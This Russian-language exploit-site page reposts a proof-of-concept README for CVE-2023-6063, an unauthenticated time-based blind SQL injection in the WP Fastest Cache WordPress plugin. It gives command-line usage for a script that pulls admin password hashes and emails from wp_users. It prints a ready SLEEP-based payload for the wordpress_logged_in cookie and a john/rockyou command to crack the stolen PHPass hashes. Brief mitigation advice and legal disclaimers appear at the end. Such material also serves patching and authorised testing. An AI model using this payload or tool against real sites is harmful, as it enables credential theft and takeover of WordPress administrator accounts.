## https://sploitus.com/exploit?id=KITPLOIT:TOOLS-GITHUB-INCOMMATOSE-CVE-2023-6063-POC
# PoC для CVE-2023-6063: WP Fastest Cache 1.2.2 Неаутентифицированная слепая SQL-инъекция
  -red)
Proof of Concept для CVE-2023-6063, уязвимости слепой SQL-инъекции на основе времени в WP Fastest Cache ≤1.2.2. Извлекает хэшированные пароли (`user_pass`) и email-адреса (`user_email`) из таблицы `wp_users`, злоупотребляя cookie `wordpress_logged_in`.
## Возможности
* Извлечение данных на основе времени (посимвольно) через задержки SLEEP().
* Поддерживает пользовательские cookie, имена пользователей и проверку хэша.
Этот скрипт извлекает:
* ☑️ Хэши паролей WordPress (MD5/PHPass).
* ☑️ Связанные email-адреса.
* Аргументы командной строки для гибкого тестирования (--just-hash, --just-email, --debug).
### Использование
Установите зависимости (если не установлены):
root@kitploit:~
pip install -r requirements.txt
Базовое использование:
root@kitploit:~
python3 poc.py -u https://vulnerable-website.com --username admin --delay 5
Полный список опций:
root@kitploit:~
-h, --help показать это справочное сообщение и выйти
-u URL, --url URL Полный URL WordPress для тестирования CVE-2023-6063
--username USERNAME Определить пользователя для извлечения его хэшированного пароля
-d DELAY, --delay DELAY
Время ожидания ответа веб-сервера, по умолчанию 5, минимум 2
-H HASH, --hash HASH Хэш для проверки в таблице wp_users, если хэш содержит специальные символы, используйте одинарные кавычки -> '<hash>'
--domain DOMAIN Имя домена для проверки email
-c COOKIE, --cookie COOKIE
Укажите имя cookie, если оно отличается в вашем контексте
--status-code STATUS_CODE
Использовать конкретный положительный статус-код, по умолчанию 200
--debug Более подробный вывод
--just-hash Извлекать только хэшированный пароль
--just-email Извлекать только email для пользователя
## 💻 Демонстрация
Это демонстрация для пользователя admin
https://github.com/user-attachments/assets/21ea643d-3b11-401f-813f-b85abdb05890
Когда хэши паролей утекают, используйте `john` или `hashcat` для их расшифровки с помощью алгоритма `PHPass`, если пароль уязвим.
Пример с John:
root@kitploit:~
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt --format=phpass
# 🕵️♂️ Технические детали
## 📖 Описание уязвимости
Плагин WP Fastest Cache (≤1.2.2) для WordPress уязвим к неаутентифицированной слепой SQL-инъекции через cookie wordpress_logged_in. Злоумышленники могут использовать этот недостаток для извлечения конфиденциальных данных (например, хэшей паролей, email-адресов) из таблицы wp_users, используя задержки на основе времени (SLEEP()) в SQL-запросах.
root@kitploit:~
" AND (IF((SELECT user_pass FROM wp_users WHERE user_login="admin") LIKE 'a%', SLEEP(5), 0))-- -
🚨 Отказ от ответственности: Используйте эту информацию только для этичного тестирования безопасности с соответствующим разрешением. Несанкционированная эксплуатация незаконна.
* CVE ID: CVE-2023-6063
* Оценка уязвимости: 7.5 (Высокая)
* Тип уязвимости: SQL-инъекция (слепая, на основе времени)
* Затронутое ПО: WP Fastest Cache (плагин WordPress) ≤ v1.2.2
## 🔍 Вектор атаки
* Эксплуатируемость: Удаленная (аутентификация не требуется)
* Сложность атаки: Низкая (эксплуатируется через специально сформированные HTTP-запросы)
## 🔥 Влияние:
* Конфиденциальность: Высокая (утечка учетных данных администратора)
* Целостность: Нет
* Доступность: Нет
## 📌 Затронутые версии
* WP Fastest Cache versions ≤1.2.2
## 🛡️ Меры по смягчению
* Обновите WP Fastest Cache до версии >1.2.2.
* Обновите WP Fastest Cache до версии v1.2.3 или новее.
* Примените правила WAF для блокировки полезных нагрузок SQLi в cookie.
* **Отключите плагин, если он не используется.**
## 📚 Ссылки
* Запись NIST NVD
* Уведомление о плагине WordPress
* Детали CVE
## ⚖️ Правовая информация
* Этот скрипт предназначен только для образовательных целей. Всегда получайте явное разрешение перед тестированием.